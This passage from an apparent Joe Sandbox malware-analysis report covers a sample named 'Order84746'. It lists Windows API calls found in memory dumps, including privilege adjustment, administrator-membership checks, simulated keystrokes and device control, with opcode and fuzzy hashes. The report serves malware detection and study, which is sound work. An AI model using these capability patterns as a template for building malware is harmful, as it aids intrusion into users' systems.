• Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Internet$AvailableDataFileQueryRead
                          • String ID:
                          • API String ID: 599397726-0
                          • Opcode ID: 8763830905227cdd452c7c2a04242f18b3fd504a40ee9f0d9cb9b941dc7af880
                          • Instruction ID: df1a72174c6eadd96caebac55646f113d7de50c7d91e72c0724603fe4590a041
                          • Opcode Fuzzy Hash: 8763830905227cdd452c7c2a04242f18b3fd504a40ee9f0d9cb9b941dc7af880
                          • Instruction Fuzzy Hash: 1441E771604609BFEB209E94CD85FBF77BCEB80758F15402EF205A6181DA75AE41DEA0
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0092E20D
                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0092E267
                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0092E2B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorMode$DiskFreeSpace
                          • String ID:
                          • API String ID: 1682464887-0
                          • Opcode ID: ede5fccf75652ed1e5958e897908c90313bc2646bace732b51103ac9f7f4c745
                          • Instruction ID: 5fc4fd4a260a71624f84252f91bfadf24c4cca9d79b7cdc1ba3a3eb5ebc91f96
                          • Opcode Fuzzy Hash: ede5fccf75652ed1e5958e897908c90313bc2646bace732b51103ac9f7f4c745
                          • Instruction Fuzzy Hash: 31216D35A10218EFCB00EFA9D884AADFBB8FF49310F0584AAE915EB351DB719905CB50
                          APIs
                            • Part of subcall function 008FF4EA: std::exception::exception.LIBCMT ref: 008FF51E
                            • Part of subcall function 008FF4EA: __CxxThrowException@8.LIBCMT ref: 008FF533
                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0091B180
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0091B1AD
                          • GetLastError.KERNEL32 ref: 0091B1BA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                          • String ID:
                          • API String ID: 1922334811-0
                          • Opcode ID: 5ca733f1d5cdfdfc5bcf984cb86477db3758101e3efe27cb3331086c2e9dd157
                          • Instruction ID: 61f329ec6a9b405c9cd28c7f6a0f37d68506bf4de8cfd2e80552b404dde3dffe
                          • Opcode Fuzzy Hash: 5ca733f1d5cdfdfc5bcf984cb86477db3758101e3efe27cb3331086c2e9dd157
                          • Instruction Fuzzy Hash: 7811C1B2A18209BFE7189F68DCC5D6BB7BDFF44310B21852EE55693241DB70FC818A60
                          APIs
                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009266AF
                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 009266EC
                          • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009266F5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CloseControlCreateDeviceFileHandle
                          • String ID:
                          • API String ID: 33631002-0
                          • Opcode ID: a0f8e42a9ad4faac8248a0301324e122e58516cfe1aa139d391cddc8b163ad24
                          • Instruction ID: 84c3a1cc74d95a046f92f7e659411ac55d4c4c843019a8a58c9849e1f7bfa086
                          • Opcode Fuzzy Hash: a0f8e42a9ad4faac8248a0301324e122e58516cfe1aa139d391cddc8b163ad24
                          • Instruction Fuzzy Hash: 3811A5B1E15228BEE7108BA8EC45FAF77BCEB09754F004555F911E7190C2B49E0487E1
                          APIs
                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00927223
                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0092723A
                          • FreeSid.ADVAPI32(?), ref: 0092724A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AllocateCheckFreeInitializeMembershipToken
                          • String ID:
                          • API String ID: 3429775523-0
                          • Opcode ID: 8eef10b66e2cce864191b6a6c78470c3a2413227bd6c71ced1732edbb791903a
                          • Instruction ID: b560a24f166bbc15de775a1c3d91310464b05fcbda97551c59ccf6d741863867
                          • Opcode Fuzzy Hash: 8eef10b66e2cce864191b6a6c78470c3a2413227bd6c71ced1732edbb791903a
                          • Instruction Fuzzy Hash: 63F01D76E15209FFDF04DFE4DD99AEEBBBCEF08201F104469E612E2191E2709A449B10
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                            • Part of subcall function 008FB526: GetWindowLongW.USER32(?,000000EB), ref: 008FB537
                          • GetParent.USER32(?), ref: 0095E5B2
                          • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,008FB1E8,?,?,?,00000006,?), ref: 0095E62C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: LongWindow$DialogNtdllParentProc_
                          • String ID:
                          • API String ID: 314495775-0
                          • Opcode ID: d7c3394c75698eb9bc139d6c39d8841a997fc5f1f6d96ee8ac5651f8f262745c
                          • Instruction ID: 6fc51e38bca3acfabe9c151b780ad0fde0b4ca8b0114a96ff84d467679364804
                          • Opcode Fuzzy Hash: d7c3394c75698eb9bc139d6c39d8841a997fc5f1f6d96ee8ac5651f8f262745c
                          • Instruction Fuzzy Hash: 55217134645118AFCB248F38C8859B93BD6FF0A368F184256FA298B3E1D7319E15D751
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 0092F599
                          • FindClose.KERNEL32(00000000), ref: 0092F5C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID:
                          • API String ID: 2295610775-0
                          • Opcode ID: 2f97e9d9daa0fcbf722b7243b32d6e2636ce5a20fc0ff7e1410ad11e2b00a390
                          • Instruction ID: c95511e714375bbb7c3ebe80dc9960236558966f807e53e9939602c73a83c78d
                          • Opcode Fuzzy Hash: 2f97e9d9daa0fcbf722b7243b32d6e2636ce5a20fc0ff7e1410ad11e2b00a390
                          • Instruction Fuzzy Hash: BB11AD726046049FD710EF29D845A2EB3E8FF89324F01892EF9A9D7291CB74A9008B91
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0095E44F,?,?,?), ref: 0094F344
                            • Part of subcall function 008FB526: GetWindowLongW.USER32(?,000000EB), ref: 008FB537
                          • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0094F32A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: LongWindow$DialogMessageNtdllProc_Send
                          • String ID:
                          • API String ID: 1273190321-0
                          • Opcode ID: 71ad2219b4d866083c57f3d0679ce5339a128b8588d9d79fafc26450523dadb6
                          • Instruction ID: 6f3189f2894edef3b152755f2427779ef25c2e35c40871498b4fa82eae1aa213
                          • Opcode Fuzzy Hash: 71ad2219b4d866083c57f3d0679ce5339a128b8588d9d79fafc26450523dadb6
                          • Instruction Fuzzy Hash: 0001D431205215AFCF219F14DC54F7A7BAAFF86364F184568F9154B2E0C771AC12EB91
                          APIs
                          • ClientToScreen.USER32(?,?), ref: 0094F6AC
                          • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0095E52B,?,?,?,?,?), ref: 0094F6D5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ClientDialogNtdllProc_Screen
                          • String ID:
                          • API String ID: 3420055661-0
                          • Opcode ID: adff48b4cad7c201e3ef22ee74ab564ee131cd8f61ad9f3454246743609bec22
                          • Instruction ID: 2cd1c899b09d7e67d415e1c69318d71154c3dac66c01f9e0fff0320000b7bbe1
                          • Opcode Fuzzy Hash: adff48b4cad7c201e3ef22ee74ab564ee131cd8f61ad9f3454246743609bec22
                          • Instruction Fuzzy Hash: 38F03A72911118FFEF048F85DC099AE7FB8FF48311F14401AF912A2160D7B1AA51EBA0
                          APIs
                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0093BE6A,?,?,00000000,?), ref: 0092CEA7
                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0093BE6A,?,?,00000000,?), ref: 0092CEB9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorFormatLastMessage
                          • String ID:
                          • API String ID: 3479602957-0
                          • Opcode ID: 730ab0f9fd78b750a9e4762ab235b7402facb30699c4e8b0435058e3d4c8ccf7
                          • Instruction ID: 8f67605f16170d40603c1117a8e27c7c445fb00159d57999f5eed8d90e16b985
                          • Opcode Fuzzy Hash: 730ab0f9fd78b750a9e4762ab235b7402facb30699c4e8b0435058e3d4c8ccf7
                          • Instruction Fuzzy Hash: 66F0EC71500229ABEB20ABA4DC48FEA336CFF083A0F008129F829D2180C6709A00CBA0
                          APIs
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00924153
                          • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00924166
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: InputSendkeybd_event
                          • String ID:
                          • API String ID: 3536248340-0
                          • Opcode ID: 47bd14aa90524c7739780530decfaf0e1194e9b6724cc3a694e7fe98db2d38df
                          • Instruction ID: fc43ad4fbc3cb6cd6dffc79479c14b664feb21f0f4c0e51447ccd0a54713507e
                          • Opcode Fuzzy Hash: 47bd14aa90524c7739780530decfaf0e1194e9b6724cc3a694e7fe98db2d38df
                          • Instruction Fuzzy Hash: 22F09A7091834DAFDB058FA0C805BBE7FB4EF14305F00840AF966AA196D7B9C612DFA4
                          APIs
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0091ACC0), ref: 0091AB99
                          • CloseHandle.KERNEL32(?,?,0091ACC0), ref: 0091ABAB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AdjustCloseHandlePrivilegesToken
                          • String ID:
                          • API String ID: 81990902-0
                          • Opcode ID: d9c9f43b422edd47181cd0c6b77b91db581d8a279246bb13f7c1c8d2cadd95f1
                          • Instruction ID: 42377f9cb74e0c33bcfc5b3d43fcd5aa68c4d4b1835ddb0664b9abf6400526f8
                          • Opcode Fuzzy Hash: d9c9f43b422edd47181cd0c6b77b91db581d8a279246bb13f7c1c8d2cadd95f1
                          • Instruction Fuzzy Hash: CEE08631014510AFE7212F24EC04D7777EDEF04320710842DF559C0431C7625C90DB50
                          APIs
                          • GetWindowLongW.USER32(?,000000EC), ref: 0094F7CB
                          • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0095E4AA,?,?,?,?), ref: 0094F7F5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: 4eb3207b2f3eb3b1767e6da807618ea2b49ff04c3be7404141f8f5c1c5523ea9
                          • Instruction ID: 8425bf23883de1681b1a1f1fc2a5a88eb22eee5bced395089eb6c54b4a5d644e
                          • Opcode Fuzzy Hash: 4eb3207b2f3eb3b1767e6da807618ea2b49ff04c3be7404141f8f5c1c5523ea9
                          • Instruction Fuzzy Hash: F0E0C230208219BBEB140F09DC2AFB93B18EB04B50F108529F96B984E0D7F49890E260
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00906DB3,-0000031A,?,?,00000001), ref: 009081B1
                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009081BA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 2cd6a735a57a51db211f6640c9c96e343ac919e53c7821a66eb4f249743d263f
                          • Instruction ID: 03f6f6a160bda8e2bfd883715fc90ed31a93511cf23011f1fe3579172822ff7e
                          • Opcode Fuzzy Hash: 2cd6a735a57a51db211f6640c9c96e343ac919e53c7821a66eb4f249743d263f
                          • Instruction Fuzzy Hash: C3B0923165A608ABDB002BA2EC09F587F68EB0865AF004018F62D442619BB25510AA96
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: cf6d5c4f0353e701c901152dc4528d47017edbb5e1085e9e2e9f41a69f837a12
                          • Instruction ID: d50f241cc2904084e3bd7555db87e97df8f81efb3d4ab510d07b2b27bf9585b4
                          • Opcode Fuzzy Hash: cf6d5c4f0353e701c901152dc4528d47017edbb5e1085e9e2e9f41a69f837a12
                          • Instruction Fuzzy Hash: BAA24870E04259CFDB24CF69C8806ADBBB1FF49314F2581A9E859EB391D7349E81DB90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Exception@8Throwstd::exception::exception
                          • String ID: @
                          • API String ID: 3728558374-2766056989
                          • Opcode ID: 4da2f8cc8faadce8d5f264968a1eccb54bf033e85dd5d9af82e2e4c1802f8e57
                          • Instruction ID: b5ae2ed53c231cace5f4a463eb396fc918d06afc3a55095f9fcca032f5752bea
                          • Opcode Fuzzy Hash: 4da2f8cc8faadce8d5f264968a1eccb54bf033e85dd5d9af82e2e4c1802f8e57
                          • Instruction Fuzzy Hash: 23727C71A0420DAFCB14DFA8D481ABEB7B5FF48304F14805AEE15EB291DB35AE45CB91
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3b2209609a74654bc2aad952fc32dd2866f68787dd26bdb1f6f1e7c13dd814ee
                          • Instruction ID: 4e7383f24e69c3460609843abcc6cbdddb6362e585acb075c5cce01c92e45bb4
                          • Opcode Fuzzy Hash: 3b2209609a74654bc2aad952fc32dd2866f68787dd26bdb1f6f1e7c13dd814ee
                          • Instruction Fuzzy Hash: 73320322D3AF014DD7279634D922335A28CEFB73D5F15D727E829B5AAAEB29C4C35100
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
